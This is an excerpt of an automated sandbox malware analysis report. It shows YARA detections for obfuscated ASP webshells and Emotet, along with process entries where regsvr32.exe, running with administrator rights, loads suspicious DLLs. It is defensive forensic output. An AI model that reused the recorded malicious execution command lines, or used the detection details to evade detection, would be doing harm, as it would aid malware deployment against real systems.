          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1411114207.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1412954439.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1542433572.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1414114730.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          Reputation:moderate

          Target ID:3
          Start time:09:06:41
          Start date:20/03/2023
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
          Imagebase:0x7ff6d5170000
          File size:24064 bytes
          MD5 hash:578BAB56836A3FE455FFC7883041825B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          Reputation:moderate

          Target ID:4
          Start time:09:06:44
          Start date:20/03/2023
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
          Imagebase:0x7ff6d5170000
          File size:24064 bytes
          MD5 hash:578BAB56836A3FE455FFC7883041825B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:moderate

          No disassembly